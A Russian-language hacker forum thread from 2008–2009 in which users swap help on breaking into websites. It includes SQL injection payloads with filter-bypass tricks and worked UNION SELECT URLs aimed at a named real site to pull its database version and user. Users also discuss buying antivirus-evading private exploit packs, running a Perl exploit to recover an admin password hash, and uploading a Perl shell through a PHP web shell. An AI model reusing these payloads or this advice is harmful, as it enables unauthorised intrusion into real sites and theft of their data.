Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. xa-xa89

    xa-xa89 Elder - Старейшина

    Joined:
    17 May 2008
    Messages:
    108
    Likes Received:
    27
    Reputations:
    2
    попробуй покрутить как слепую скуль.
     
  2. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    В зависимости от конкретной ситуации... дай реальный пример...
     
  3. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    -12/**/ANd/**/1=2/**/uNioN/**/SeLecT/**/1,2,3/*
    Попробуй так что ле...
    Без пример сложновато ;)
     
  4. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Существуют ли бесплатные связки эксплоитов?
    Если да, то какие лежат в паблике?
     
  5. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    В паблике такие связки, которые паляться антивирусами.
    А в привате, за очень неплохие деньги, антивирами не будет палиться, и распуститься быстро.
     
  6. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Прив связки не так то и сложно достать...
     
  7. (Dm)

    (Dm) Elder - Старейшина

    Joined:
    8 Apr 2008
    Messages:
    261
    Likes Received:
    440
    Reputations:
    275
    Возможно Apache с mod_security, по обходу, попробуй POST'ом послать.
     
  8. smth

    smth New Member

    Joined:
    14 Sep 2009
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    Пробуй вот так
    http://site.net/index.php?id=777+union+select+1,2,3/* должно быть корректно, затем подставь -777 и ищи вывод

    зачем тебе and+1=2 ?!?!
     
  9. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Собственно вопрос, как добиться вывода в этой скуле...
     
  10. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    там вообще прикол:

    Code:
    http://www.mibf.ru/index.php?id=-23+or+1=1
     
  11. Dyxxx

    Dyxxx Elder - Старейшина

    Joined:
    16 Feb 2009
    Messages:
    107
    Likes Received:
    155
    Reputations:
    24
    http://www.mibf.ru/index.php?id=23+union+select+null,null,null,null,null,null,null,0x73716C,null,null+limit+1,1+--+
    редиректит на урл в котором вывод
    Code:
    http://www.mibf.ru/index.php?id=999999+union+select+null,null,null,null,null,null,null,concat_ws(0x3a,version(),user()),null,null+--+
     
    #9191 Dyxxx, 9 Oct 2009
    Last edited: 9 Oct 2009
    2 people like this.
  12. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Миллионер? ;)
    Приватные связки, неплохо стоят, но если делается что то "шикарное", то деньги можно достать.
     
  13. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    Дайте пожалуйста ссыль на онлайн hex редактор, гдето потерял, пол дня ищю....пожалуйста
     
  14. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    isfuck.me/?tools=sql
    ascii encode hex and char
     
    1 person likes this.
  15. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Приват льют на право и на лево и при хороших знакомствах у тебя будет все, что необходимо + файлообменники (очень уж часто не ставят пароли на архивы :))

    2Dyxxx, спс, но уже разобрался...
     
  16. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    хорошую связку ты даже не купишь! а ты говроишь найти на файлообменике, дураков в этом бизе нет ;)
     
  17. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Ну вот это возможно :)
    http://www.softportal.com/software-948-winhex.html
     
  18. Patronik

    Patronik Member

    Joined:
    16 Mar 2009
    Messages:
    111
    Likes Received:
    12
    Reputations:
    0
    Народ привет. Извините если боаян.
    Есть такая штука но не уверен что ето уязвимость.
    На форуме IPB версия 1.3.1 при вводе в урл такой строки
    http://[target]/ipb/index.php?act=Online&st=-1
    видает такое:
    [​IMG]
    Что можно с етим сделать? или ничего?

    И еще если после запуска сплоита на перле с командной строки, там где должен находиться хеш пароля админа написало слово FAILED. Значит етим сплоитом ничего уже не сделаеш?
     
  19. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Да, там сразу SQL Иньекция идёт.
     
  20. andrrr

    andrrr New Member

    Joined:
    19 Sep 2009
    Messages:
    15
    Likes Received:
    1
    Reputations:
    0
    Скажите, пожалуйста, как залить перл шелл ? Сложность в том, что нужно заливать в ascii, а я не знаю как это сделать за неимением фтп-доступа.. доступны wget, lynx. может его создать прям на хосте можно(имется пхп веб шелл, доступна system() )
     
Thread Status:
Not open for further replies.